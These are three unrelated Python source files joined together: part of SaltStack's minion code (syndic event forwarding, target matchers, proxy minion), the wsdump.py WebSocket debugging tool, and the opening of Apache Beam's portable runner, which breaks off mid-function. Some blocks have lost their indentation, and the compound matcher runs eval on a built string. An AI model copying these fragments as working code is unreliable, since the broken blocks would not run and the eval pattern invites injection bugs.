            time.sleep(master_dict['dead_until'] - time.time())
        connected = self._connect_to_master(master)
        if not connected:
            time.sleep(1)
    self._has_master.set()
# TODO: do we need all of this?
def _connect_to_master(self, master):
    '''
    Attempt to connect to master, including back-off for each one
    return boolean of whether you connected or not
    '''
    log.debug('Syndic attempting to connect to {0}'.format(master))
    if master not in self.master_syndics:
        log.error('Unable to connect to {0}, not in the list of masters'.format(master))
        return False
    minion = self.master_syndics[master]
    try:
        t_minion = Syndic(minion['opts'],
                          timeout=self.SYNDIC_CONNECT_TIMEOUT,
                          safe=False,
                          )
        # keep both the Syndic object and its tune_in generator around;
        # a successful sign-in resets the back-off bookkeeping
        self.master_syndics[master]['syndic'] = t_minion
        self.master_syndics[master]['generator'] = t_minion.tune_in_no_block()
        self.master_syndics[master]['auth_wait'] = self.opts['acceptance_wait_time']
        self.master_syndics[master]['dead_until'] = 0
        log.info('Syndic successfully connected to {0}'.format(master))
        return True
    except SaltClientError:
        log.error('Error while bring up minion for multi-syndic. Is master {0} responding?'.format(master))
        # re-use auth-wait as backoff for syndic
        minion['dead_until'] = time.time() + minion['auth_wait']
        if minion['auth_wait'] < self.opts['acceptance_wait_time_max']:
            minion['auth_wait'] += self.opts['acceptance_wait_time']
    return False
# TODO: Move to an async framework of some type-- channel (the event thing
# underneath) doesn't handle failures well, and will retry 3 times at 60s
# timeouts-- which all block the main thread's execution. For now we just
# cause failures to kick off threads to look for the master to come back up
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
    '''
    Wrapper to call a given func on a syndic, best effort to get the one you asked for

    func      -- name of the method to invoke on a connected Syndic
    args      -- positional arguments forwarded to that method
    kwargs    -- keyword arguments forwarded to that method
    master_id -- preferred master; other connected masters are tried
                 (in shuffled order) if it is unavailable
    '''
    if kwargs is None:
        kwargs = {}
    for master, syndic_dict in self.iter_master_options(master_id):
        if 'syndic' not in syndic_dict:
            # never connected to this master yet; skip it
            continue
        if syndic_dict['dead_until'] > time.time():
            # still inside this master's back-off window
            log.error('Unable to call {0} on {1}, that syndic is dead for now'.format(func, master))
            continue
        try:
            ret = getattr(syndic_dict['syndic'], func)(*args, **kwargs)
            if ret is not False:
                log.debug('{0} called on {1}'.format(func, master))
                return
        except (SaltClientError, SaltReqTimeoutError):
            pass
        # Either the call returned False or it raised: treat this master
        # as unreachable and move on to the next candidate.
        log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
        # If the connection is dead, lets have another thread wait for it to come back
        self._init_master_conn(master)
        continue
    log.critical('Unable to call {0} on any masters!'.format(func))
def iter_master_options(self, master_id=None):
    '''
    Iterate (in order) over your options for master

    Yields ``(master_id, syndic_dict)`` pairs, starting with the
    requested master when it is known, then the remaining masters in
    shuffled order.
    '''
    candidates = list(self.master_syndics.keys())
    shuffle(candidates)
    if master_id in self.master_syndics:
        # requested master goes first; take it out of the shuffled pool
        candidates.remove(master_id)
    else:
        # unknown (or None): just start with a random master
        master_id = candidates.pop(0)
    while True:
        yield master_id, self.master_syndics[master_id]
        if not candidates:
            break
        master_id = candidates.pop(0)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
self.event_forward_timeout = None
# Syndic Tune In
def tune_in(self):
    '''
    Lock onto the publisher. This is the main event loop for the syndic
    '''
    # Instantiate the local client
    self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
    self.local.event.subscribe('')
    log.debug('MultiSyndic {0!r} trying to tune in'.format(self.opts['id']))
    # Share the poller with the event object
    self.poller = self.local.event.poller
    # Make sure to gracefully handle SIGUSR1
    enable_sigusr1_handler()
    loop_interval = int(self.opts['loop_interval'])
    self._reset_event_aggregation()
    while True:
        try:
            # Do all the maths in seconds
            timeout = loop_interval
            if self.event_forward_timeout is not None:
                # shrink the poll timeout so we wake up in time to flush
                # buffered events at the forward deadline
                timeout = min(timeout,
                              self.event_forward_timeout - time.time())
            if timeout >= 0:
                log.trace('Polling timeout: %f', timeout)
                socks = dict(self.poller.poll(timeout * 1000))
            else:
                # This shouldn't really happen.
                # But there's no harm being defensive
                log.warning('Negative timeout in syndic main loop')
                socks = {}
            # check all of your master_syndics, have them do their thing
            for master_id, syndic_dict in six.iteritems(self.master_syndics):
                # if not connected, lets try
                if 'generator' not in syndic_dict:
                    log.info('Syndic still not connected to {0}'.format(master_id))
                    # if we couldn't connect, lets try later
                    continue
                # drive this master's non-blocking tune-in generator one step
                next(syndic_dict['generator'])
            # events
            if socks.get(self.local.event.sub) == zmq.POLLIN:
                self._process_event_socket()
            # flush aggregated events once the forward deadline has passed
            if self.event_forward_timeout is not None \
                    and self.event_forward_timeout < time.time():
                self._forward_events()
        # We don't handle ZMQErrors like the other minions
        # I've put explicit handling around the receive calls
        # in the process_*_socket methods. If we see any other
        # errors they may need some kind of handling so log them
        # for now.
        except Exception:
            log.critical(
                'An exception occurred while polling the syndic',
                exc_info=True
            )
def _process_event_socket(self):
    '''
    Drain the local event bus and aggregate job returns for forwarding.

    Runs for at most ``syndic_max_event_process_time`` seconds so a busy
    event bus cannot starve the main loop.
    '''
    tout = time.time() + self.opts['syndic_max_event_process_time']
    while tout > time.time():
        try:
            event = self.local.event.get_event_noblock()
        except zmq.ZMQError as e:
            # EAGAIN indicates no more events at the moment
            # EINTR some kind of signal maybe someone trying
            # to get us to quit so escape our timeout
            if e.errno == errno.EAGAIN or e.errno == errno.EINTR:
                break
            raise
        log.trace('Got event {0}'.format(event['tag']))
        if self.event_forward_timeout is None:
            # the first buffered event starts the forwarding deadline
            self.event_forward_timeout = (
                time.time() + self.opts['syndic_event_forward_timeout']
            )
        # Job return tags look like: <prefix>/job/<jid>/ret/...
        tag_parts = event['tag'].split('/')
        if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
                salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
                'return' in event['data']:
            if 'jid' not in event['data']:
                # Not a job return
                continue
            # NOTE(review): the asymmetric defaults (0 vs 1) ensure two
            # missing master_id keys never compare equal here.
            if self.syndic_mode == 'cluster' and event['data'].get('master_id', 0) == self.opts.get('master_id', 1):
                log.debug('Return recieved with matching master_id, not forwarding')
                continue
            jdict = self.jids.setdefault(event['tag'], {})
            if not jdict:
                # first return seen for this tag: record the job metadata
                jdict['__fun__'] = event['data'].get('fun')
                jdict['__jid__'] = event['data']['jid']
                jdict['__load__'] = {}
                fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
                # Only need to forward each load once. Don't hit the disk
                # for every minion return!
                if event['data']['jid'] not in self.jid_forward_cache:
                    jdict['__load__'].update(
                        self.mminion.returners[fstr](event['data']['jid'])
                    )
                    self.jid_forward_cache.add(event['data']['jid'])
                    if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
                        # Pop the oldest jid from the cache
                        tmp = sorted(list(self.jid_forward_cache))
                        tmp.pop(0)
                        self.jid_forward_cache = set(tmp)
            if 'master_id' in event['data']:
                # __'s to make sure it doesn't print out on the master cli
                jdict['__master_id__'] = event['data']['master_id']
            # accumulate each minion's return under its id
            jdict[event['data']['id']] = event['data']['return']
        else:
            # TODO: config to forward these? If so we'll have to keep track of who
            # has seen them
            # if we are the top level masters-- don't forward all the minion events
            if self.syndic_mode == 'sync':
                # Add generic event aggregation here
                if 'retcode' not in event['data']:
                    self.raw_events.append(event)
def _forward_events(self):
    '''
    Flush the aggregated raw events and job returns up to a master,
    then reset the aggregation buffers.
    '''
    log.trace('Forwarding events')
    if self.raw_events:
        fire_kwargs = {'events': self.raw_events,
                       'pretag': tagify(self.opts['id'], base='syndic'),
                       'timeout': self.SYNDIC_EVENT_TIMEOUT}
        self._call_syndic('_fire_master', kwargs=fire_kwargs)
    # Send each aggregated job return back, preferring the master the
    # job originated from when one was recorded.
    for jid_ret in self.jids.values():
        self._call_syndic('_return_pub',
                          args=(jid_ret, '_syndic_return'),
                          kwargs={'timeout': self.SYNDIC_EVENT_TIMEOUT},
                          master_id=jid_ret.get('__master_id__'))
    self._reset_event_aggregation()
class Matcher(object):
    '''
    Use to return the value for matching calls from the master
    '''
    def __init__(self, opts, functions=None):
        # opts: minion configuration dict (needs 'id', 'grains', 'pillar')
        # functions: loaded execution modules; lazily loaded by data_match
        self.opts = opts
        self.functions = functions

    def confirm_top(self, match, data, nodegroups=None):
        '''
        Takes the data passed to a top file environment and determines if the
        data matches this minion
        '''
        matcher = 'compound'
        if not data:
            log.error('Received bad data when setting the match from the top '
                      'file')
            return False
        for item in data:
            if isinstance(item, dict):
                if 'match' in item:
                    matcher = item['match']
        if hasattr(self, matcher + '_match'):
            funcname = '{0}_match'.format(matcher)
            if matcher == 'nodegroup':
                # nodegroup matching needs the nodegroup definitions too
                return getattr(self, funcname)(match, nodegroups)
            return getattr(self, funcname)(match)
        else:
            log.error('Attempting to match with unknown matcher: {0}'.format(
                matcher
            ))
            return False

    def glob_match(self, tgt):
        '''
        Returns true if the passed glob matches the id
        '''
        if not isinstance(tgt, six.string_types):
            return False
        return fnmatch.fnmatch(self.opts['id'], tgt)

    def pcre_match(self, tgt):
        '''
        Returns true if the passed pcre regex matches
        '''
        return bool(re.match(tgt, self.opts['id']))

    def list_match(self, tgt):
        '''
        Determines if this host is on the list
        '''
        if isinstance(tgt, six.string_types):
            tgt = tgt.split(',')
        return bool(self.opts['id'] in tgt)

    def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
        '''
        Reads in the grains glob match
        '''
        log.debug('grains target: {0}'.format(tgt))
        if delimiter not in tgt:
            log.error('Got insufficient arguments for grains match '
                      'statement from master')
            return False
        return salt.utils.subdict_match(
            self.opts['grains'], tgt, delimiter=delimiter
        )

    def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
        '''
        Matches a grain based on regex
        '''
        log.debug('grains pcre target: {0}'.format(tgt))
        if delimiter not in tgt:
            log.error('Got insufficient arguments for grains pcre match '
                      'statement from master')
            return False
        return salt.utils.subdict_match(self.opts['grains'], tgt,
                                        delimiter=delimiter, regex_match=True)

    def data_match(self, tgt):
        '''
        Match based on the local data store on the minion
        '''
        if self.functions is None:
            # lazy-load the execution modules only when needed
            utils = salt.loader.utils(self.opts)
            self.functions = salt.loader.minion_mods(self.opts, utils=utils)
        comps = tgt.split(':')
        if len(comps) < 2:
            return False
        val = self.functions['data.getval'](comps[0])
        if val is None:
            # The value is not defined
            return False
        if isinstance(val, list):
            # We are matching a single component to a single list member
            for member in val:
                if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
                    return True
            return False
        if isinstance(val, dict):
            if comps[1] in val:
                return True
            return False
        return bool(fnmatch.fnmatch(
            val,
            comps[1],
        ))

    def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
        '''
        Reads in the pillar glob match
        '''
        log.debug('pillar target: {0}'.format(tgt))
        if delimiter not in tgt:
            log.error('Got insufficient arguments for pillar match '
                      'statement from master')
            return False
        return salt.utils.subdict_match(
            self.opts['pillar'], tgt, delimiter=delimiter
        )

    def pillar_exact_match(self, tgt, delimiter=':'):
        '''
        Reads in the pillar match, no globbing
        '''
        log.debug('pillar target: {0}'.format(tgt))
        if delimiter not in tgt:
            log.error('Got insufficient arguments for pillar match '
                      'statement from master')
            return False
        return salt.utils.subdict_match(self.opts['pillar'],
                                        tgt,
                                        delimiter=delimiter,
                                        exact_match=True)

    def ipcidr_match(self, tgt):
        '''
        Matches based on ip address or CIDR notation
        '''
        num_parts = len(tgt.split('/'))
        if num_parts > 2:
            # Target is not valid CIDR
            return False
        elif num_parts == 2:
            # Target is CIDR
            return salt.utils.network.in_subnet(
                tgt,
                addrs=self.opts['grains'].get('ipv4', [])
            )
        else:
            # Target is an IPv4 address
            import socket
            try:
                socket.inet_aton(tgt)
            except socket.error:
                # Not a valid IPv4 address
                return False
            else:
                return tgt in self.opts['grains'].get('ipv4', [])

    def range_match(self, tgt):
        '''
        Matches based on range cluster
        '''
        if HAS_RANGE:
            range_ = seco.range.Range(self.opts['range_server'])
            try:
                return self.opts['grains']['fqdn'] in range_.expand(tgt)
            except seco.range.RangeException as exc:
                log.debug('Range exception in compound match: {0}'.format(exc))
                return False
        return False

    def compound_match(self, tgt):
        '''
        Runs the compound target check
        '''
        if not isinstance(tgt, six.string_types):
            log.debug('Compound target received that is not a string')
            return False
        # single-letter prefixes mapping to the matcher methods above
        ref = {'G': 'grain',
               'P': 'grain_pcre',
               'I': 'pillar',
               'L': 'list',
               'S': 'ipcidr',
               'E': 'pcre'}
        if HAS_RANGE:
            ref['R'] = 'range'
        results = []
        opers = ['and', 'or', 'not', '(', ')']
        tokens = tgt.split()
        for match in tokens:
            # Try to match tokens from the compound target, first by using
            # the 'G, X, I, L, S, E' matcher types, then by hostname glob.
            # FIX: use a slice (match[1:2]) instead of match[1] so a bare
            # '@' token cannot raise IndexError.
            if '@' in match and match[1:2] == '@':
                comps = match.split('@')
                matcher = ref.get(comps[0])
                if not matcher:
                    # If an unknown matcher is called at any time, fail out
                    return False
                results.append(
                    str(
                        getattr(self, '{0}_match'.format(matcher))(
                            '@'.join(comps[1:])
                        )
                    )
                )
            elif match in opers:
                # We didn't match a target, so append a boolean operator or
                # subexpression
                if results or match in ['(', ')']:
                    if match == 'not':
                        # implicit 'and' before a leading 'not'
                        match_suffix = results[-1]
                        if not (match_suffix == 'and' or match_suffix == 'or'):
                            results.append('and')
                    results.append(match)
                else:
                    # seq start with oper, fail
                    if match not in ['(', ')']:
                        return False
            else:
                # The match is not explicitly defined, evaluate it as a glob
                results.append(str(self.glob_match(match)))
        results = ' '.join(results)
        try:
            # NOTE: `results` is built exclusively from the literals
            # 'True'/'False' and the operators above, which constrains what
            # eval can see -- but eval on constructed strings is still worth
            # keeping an eye on if this builder ever changes.
            return eval(results)  # pylint: disable=W0123
        except Exception:
            log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
            return False
        return False

    def nodegroup_match(self, tgt, nodegroups):
        '''
        This is a compatibility matcher and is NOT called when using
        nodegroups for remote execution, but is called when the nodegroups
        matcher is used in states
        '''
        if tgt in nodegroups:
            return self.compound_match(
                salt.utils.minions.nodegroup_comp(tgt, nodegroups)
            )
        return False
class ProxyMinion(Minion):
    '''
    This class instantiates a 'proxy' minion--a minion that does not manipulate
    the host it runs on, but instead manipulates a device that cannot run a minion.
    '''
    def __init__(self, opts, timeout=60, safe=True):  # pylint: disable=W0231
        '''
        Pass in the options dict

        opts    -- configuration dict; must contain a 'proxy' section with a
                   'proxytype' key naming the proxy module to load
        timeout -- seconds passed through to authenticate()
        safe    -- passed through to authenticate()
        '''
        self._running = None
        # Warn if ZMQ < 3.2
        if HAS_ZMQ:
            try:
                zmq_version_info = zmq.zmq_version_info()
            except AttributeError:
                # PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
                # using zmq.zmq_version() and build a version info tuple.
                zmq_version_info = tuple(
                    [int(x) for x in zmq.zmq_version().split('.')]
                )
            if zmq_version_info < (3, 2):
                log.warning(
                    'You have a version of ZMQ less than ZMQ 3.2! There are '
                    'known connection keep-alive issues with ZMQ < 3.2 which '
                    'may result in loss of contact with minions. Please '
                    'upgrade your ZMQ!'
                )
        # Late setup the of the opts grains, so we can log from the grains
        # module
        # print opts['proxymodule']
        fq_proxyname = 'proxy.'+opts['proxy']['proxytype']
        self.proxymodule = salt.loader.proxy(opts, fq_proxyname)
        # The proxy connection object mediates all communication with the
        # managed device; this minion's id is derived from it rather than
        # from the local host.
        opts['proxyobject'] = self.proxymodule[opts['proxy']['proxytype']+'.Proxyconn'](opts['proxy'])
        opts['id'] = opts['proxyobject'].id(opts)
        opts.update(resolve_dns(opts))
        self.opts = opts
        # Authenticate before compiling pillar, which needs master access.
        self.authenticate(timeout, safe)
        self.opts['pillar'] = salt.pillar.get_pillar(
            opts,
            opts['grains'],
            opts['id'],
            opts['environment']
        ).compile_pillar()
        self.functions, self.returners, self.function_errors = self._load_modules()
        self.serial = salt.payload.Serial(self.opts)
        self.mod_opts = self._prep_mod_opts()
        self.matcher = Matcher(self.opts, self.functions)
        uid = salt.utils.get_uid(user=opts.get('user', None))
        self.proc_dir = get_proc_dir(opts['cachedir'], uid=uid)
        self.schedule = salt.utils.schedule.Schedule(
            self.opts,
            self.functions,
            self.returners)
        self.grains_cache = self.opts['grains']
        # self._running = True

    def _prep_mod_opts(self):
        '''
        Returns a copy of the opts with key bits stripped out
        '''
        # Plain passthrough to Minion; kept so proxies can override later.
        return super(ProxyMinion, self)._prep_mod_opts()

    def _load_modules(self, force_refresh=False, notify=False):
        '''
        Return the functions and the returners loaded up from the loader
        module
        '''
        # Plain passthrough to Minion; kept so proxies can override later.
        return super(ProxyMinion, self)._load_modules(force_refresh=force_refresh, notify=notify)
|
wsdump.py
|
#!/usr/bin/env python
import argparse
import code
import sys
import threading
import time
import ssl
import gzip
import zlib
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
    """Return sys.stdin's encoding, lower-cased, defaulting to utf-8."""
    encoding = getattr(sys.stdin, "encoding", "")
    return encoding.lower() if encoding else "utf-8"
# Frame opcodes that carry payload data (text/binary), as opposed to
# control frames (close/ping/pong).
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
# Console encoding, cached once and used to normalize typed input.
ENCODING = get_encoding()
class VAction(argparse.Action):
    """argparse action turning ``-v N``, ``-v`` or repeated ``-vv...``
    into an integer verbosity level."""
    def __call__(self, parser, args, values, option_string=None):
        raw = "1" if values is None else values
        try:
            level = int(raw)
        except ValueError:
            # e.g. "-vvv" arrives as "vv": count the v's plus the flag itself
            level = raw.count("v") + 1
        setattr(args, self.dest, level)
def parse_args():
    """Define and parse the wsdump command-line interface."""
    ap = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
    ap.add_argument("url", metavar="ws_url",
                    help="websocket url. ex. ws://echo.websocket.org/")
    ap.add_argument("-p", "--proxy",
                    help="proxy url. ex. http://127.0.0.1:8080")
    ap.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
                    dest="verbose",
                    help="set verbose mode. If set to 1, show opcode. "
                    "If set to 2, enable to trace websocket module")
    ap.add_argument("-n", "--nocert", action='store_true',
                    help="Ignore invalid SSL cert")
    ap.add_argument("-r", "--raw", action="store_true", help="raw output")
    ap.add_argument("-s", "--subprotocols", nargs='*', help="Set subprotocols")
    ap.add_argument("-o", "--origin", help="Set origin")
    ap.add_argument("--eof-wait", default=0, type=int,
                    help="wait time(second) after 'EOF' received.")
    ap.add_argument("-t", "--text", help="Send initial text")
    ap.add_argument("--timings", action="store_true",
                    help="Print timings in seconds")
    ap.add_argument("--headers",
                    help="Set custom headers. Use ',' as separator")
    return ap.parse_args()
class RawInput:
    """Prompt for a line of console input, normalized to utf-8 bytes
    regardless of the terminal's native encoding."""
    def raw_input(self, prompt):
        if six.PY3:
            line = input(prompt)
        else:
            line = raw_input(prompt)
        if isinstance(line, six.text_type):
            line = line.encode("utf-8")
        elif ENCODING and ENCODING != "utf-8":
            # byte input in some other console encoding: transcode it
            line = line.decode(ENCODING).encode("utf-8")
        return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
    """Interactive console: received frames are echoed in blue above a
    fresh '> ' prompt using ANSI escapes."""
    def write(self, data):
        out = sys.stdout
        # clear the current line, print the message, redraw the prompt
        out.write("\033[2K\033[E")
        out.write("\033[34m< " + data + "\033[39m")
        out.write("\n> ")
        out.flush()

    def read(self):
        return self.raw_input("> ")
class NonInteractive(RawInput):
    """Plain console used with --raw: echo messages verbatim, one per line."""
    def write(self, data):
        out = sys.stdout
        out.write(data)
        out.write("\n")
        out.flush()

    def read(self):
        return self.raw_input("")
def main():
    """Connect to the websocket URL given on the command line, dump
    incoming frames to the console from a background thread, and forward
    typed lines to the server until EOF or Ctrl+C."""
    start_time = time.time()
    args = parse_args()
    if args.verbose > 1:
        websocket.enableTrace(True)
    options = {}
    if args.proxy:
        p = urlparse(args.proxy)
        options["http_proxy_host"] = p.hostname
        options["http_proxy_port"] = p.port
    if args.origin:
        options["origin"] = args.origin
    if args.subprotocols:
        options["subprotocols"] = args.subprotocols
    opts = {}
    if args.nocert:
        # --nocert: skip certificate and hostname verification
        opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
    if args.headers:
        options['header'] = list(map(str.strip, args.headers.split(',')))
    ws = websocket.create_connection(args.url, sslopt=opts, **options)
    if args.raw:
        console = NonInteractive()
    else:
        console = InteractiveConsole()
        print("Press Ctrl+C to quit")

    def recv():
        # Read one frame; answer close/ping control frames as required.
        try:
            frame = ws.recv_frame()
        except websocket.WebSocketException:
            return websocket.ABNF.OPCODE_CLOSE, None
        if not frame:
            raise websocket.WebSocketException("Not a valid frame %s" % frame)
        elif frame.opcode in OPCODE_DATA:
            return frame.opcode, frame.data
        elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
            ws.send_close()
            return frame.opcode, None
        elif frame.opcode == websocket.ABNF.OPCODE_PING:
            ws.pong(frame.data)
            return frame.opcode, frame.data
        return frame.opcode, frame.data

    def recv_ws():
        # Receiver loop: decode/decompress payloads and echo to the console.
        while True:
            opcode, data = recv()
            msg = None
            if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
                data = str(data, "utf-8")
            if isinstance(data, bytes) and len(data) > 2 and data[:2] == b'\037\213':  # gzip magick
                try:
                    data = "[gzip] " + str(gzip.decompress(data), "utf-8")
                except Exception:
                    # FIX: was a bare 'except:', which also swallowed
                    # SystemExit/KeyboardInterrupt; fall through to show raw
                    pass
            elif isinstance(data, bytes):
                try:
                    data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8")
                except Exception:
                    # FIX: bare except narrowed here as well
                    pass
            if isinstance(data, bytes):
                data = repr(data)
            if args.verbose:
                msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
            else:
                msg = data
            if msg is not None:
                if args.timings:
                    console.write(str(time.time() - start_time) + ": " + msg)
                else:
                    console.write(msg)
            if opcode == websocket.ABNF.OPCODE_CLOSE:
                break

    thread = threading.Thread(target=recv_ws)
    thread.daemon = True
    thread.start()
    if args.text:
        ws.send(args.text)
    while True:
        try:
            message = console.read()
            ws.send(message)
        except KeyboardInterrupt:
            return
        except EOFError:
            # honor --eof-wait so late frames can still be printed
            time.sleep(args.eof_wait)
            return
if __name__ == "__main__":
    try:
        main()
    except Exception as e:
        # Print only the error message, not a traceback, so routine
        # failures (e.g. connection refused) exit quietly.
        print(e)
|
portable_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
from __future__ import absolute_import
from __future__ import division
import atexit
import functools
import itertools
import logging
import threading
import time
from typing import TYPE_CHECKING
from typing import Any
from typing import Iterator
from typing import Optional
from typing import Tuple
import grpc
from apache_beam.metrics import metric
from apache_beam.metrics.execution import MetricResult
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PortableOptions
from apache_beam.options.pipeline_options import SetupOptions
from apache_beam.options.pipeline_options import StandardOptions
from apache_beam.options.value_provider import ValueProvider
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.runners import runner
from apache_beam.runners.job import utils as job_utils
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import job_server
from apache_beam.runners.portability import portable_metrics
from apache_beam.runners.portability.fn_api_runner.fn_runner import translations
from apache_beam.runners.worker import sdk_worker_main
from apache_beam.runners.worker import worker_pool_main
from apache_beam.transforms import environments
if TYPE_CHECKING:
from google.protobuf import struct_pb2 # pylint: disable=ungrouped-imports
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.pipeline import Pipeline
from apache_beam.portability.api import beam_runner_api_pb2
__all__ = ['PortableRunner']
# Map Job API message importance levels onto stdlib logging levels used
# when echoing job-service messages to the local logger.
MESSAGE_LOG_LEVELS = {
    beam_job_api_pb2.JobMessage.MESSAGE_IMPORTANCE_UNSPECIFIED: logging.INFO,
    beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG: logging.DEBUG,
    beam_job_api_pb2.JobMessage.JOB_MESSAGE_DETAILED: logging.DEBUG,
    beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC: logging.INFO,
    beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING: logging.WARNING,
    beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR: logging.ERROR,
}

# Job states from which a job can never transition out.
TERMINAL_STATES = [
    beam_job_api_pb2.JobState.DONE,
    beam_job_api_pb2.JobState.DRAINED,
    beam_job_api_pb2.JobState.FAILED,
    beam_job_api_pb2.JobState.CANCELLED,
]

# User-facing aliases: LOOPBACK is an EXTERNAL environment whose worker
# pool is started inside this process (see PortableRunner.run_pipeline).
ENV_TYPE_ALIASES = {'LOOPBACK': 'EXTERNAL'}

_LOGGER = logging.getLogger(__name__)
class JobServiceHandle(object):
    """
    Encapsulates the interactions necessary to submit a pipeline to a job service.

    The base set of interactions consists of 3 steps:
    - prepare
    - stage
    - run
    """
    def __init__(self, job_service, options, retain_unknown_options=False):
        # job_service: gRPC stub for the Beam Job API.
        # options: PipelineOptions of the job being submitted.
        self.job_service = job_service
        self.options = options
        self.timeout = options.view_as(PortableOptions).job_server_timeout
        self._retain_unknown_options = retain_unknown_options

    def submit(self, proto_pipeline):
        # type: (beam_runner_api_pb2.Pipeline) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
        """
        Submit and run the pipeline defined by `proto_pipeline`.

        Returns (job_id, message_stream, state_stream) from run().
        """
        prepare_response = self.prepare(proto_pipeline)
        self.stage(
            proto_pipeline,
            prepare_response.artifact_staging_endpoint.url,
            prepare_response.staging_session_token)
        return self.run(prepare_response.preparation_id)

    def get_pipeline_options(self):
        # type: () -> struct_pb2.Struct
        """
        Get `self.options` as a protobuf Struct
        """

        # fetch runner options from job service
        # retries in case the channel is not ready
        def send_options_request(max_retries=5):
            num_retries = 0
            while True:
                try:
                    # This reports channel is READY but connections may fail
                    # Seems to be only an issue on Mac with port forwardings
                    return self.job_service.DescribePipelineOptions(
                        beam_job_api_pb2.DescribePipelineOptionsRequest(),
                        timeout=self.timeout)
                except grpc.FutureTimeoutError:
                    # no retry for timeout errors
                    raise
                except grpc.RpcError as e:
                    num_retries += 1
                    if num_retries > max_retries:
                        raise e
                    time.sleep(1)

        options_response = send_options_request()

        def add_runner_options(parser):
            # Expose the runner-declared options as argparse arguments so
            # user-supplied values are picked up by get_all_options() below.
            for option in options_response.options:
                try:
                    # no default values - we don't want runner options
                    # added unless they were specified by the user
                    add_arg_args = {'action': 'store', 'help': option.description}
                    if option.type == beam_job_api_pb2.PipelineOptionType.BOOLEAN:
                        add_arg_args['action'] = 'store_true' \
                            if option.default_value != 'true' else 'store_false'
                    elif option.type == beam_job_api_pb2.PipelineOptionType.INTEGER:
                        add_arg_args['type'] = int
                    elif option.type == beam_job_api_pb2.PipelineOptionType.ARRAY:
                        add_arg_args['action'] = 'append'
                    parser.add_argument("--%s" % option.name, **add_arg_args)
                except Exception as e:
                    # ignore runner options that are already present
                    # only in this case is duplicate not treated as error
                    if 'conflicting option string' not in str(e):
                        raise
                    _LOGGER.debug("Runner option '%s' was already added" % option.name)

        all_options = self.options.get_all_options(
            add_extra_args_fn=add_runner_options,
            retain_unknown_options=self._retain_unknown_options)

        def convert_pipeline_option_value(v):
            # convert int values: BEAM-5509
            if type(v) == int:
                return str(v)
            elif isinstance(v, ValueProvider):
                return convert_pipeline_option_value(
                    v.get()) if v.is_accessible() else None
            return v

        # TODO: Define URNs for options.
        p_options = {
            'beam:option:' + k + ':v1': convert_pipeline_option_value(v)
            for k,
            v in all_options.items() if v is not None
        }
        return job_utils.dict_to_struct(p_options)

    def prepare(self, proto_pipeline):
        # type: (beam_runner_api_pb2.Pipeline) -> beam_job_api_pb2.PrepareJobResponse
        """Prepare the job on the job service"""
        return self.job_service.Prepare(
            beam_job_api_pb2.PrepareJobRequest(
                job_name='job',
                pipeline=proto_pipeline,
                pipeline_options=self.get_pipeline_options()),
            timeout=self.timeout)

    def stage(self, pipeline, artifact_staging_endpoint, staging_session_token):
        # type: (...) -> Optional[Any]
        """Stage artifacts"""
        # No endpoint means the job service needs no artifact staging.
        if artifact_staging_endpoint:
            artifact_service.offer_artifacts(
                beam_artifact_api_pb2_grpc.ArtifactStagingServiceStub(
                    channel=grpc.insecure_channel(artifact_staging_endpoint)),
                artifact_service.ArtifactRetrievalService(
                    artifact_service.BeamFilesystemHandler(None).file_reader),
                staging_session_token)

    def run(self, preparation_id):
        # type: (str) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
        """Run the job"""
        try:
            state_stream = self.job_service.GetStateStream(
                beam_job_api_pb2.GetJobStateRequest(job_id=preparation_id),
                timeout=self.timeout)
            # If there's an error, we don't always get it until we try to read.
            # Fortunately, there's always an immediate current state published.
            state_stream = itertools.chain([next(state_stream)], state_stream)
            message_stream = self.job_service.GetMessageStream(
                beam_job_api_pb2.JobMessagesRequest(job_id=preparation_id),
                timeout=self.timeout)
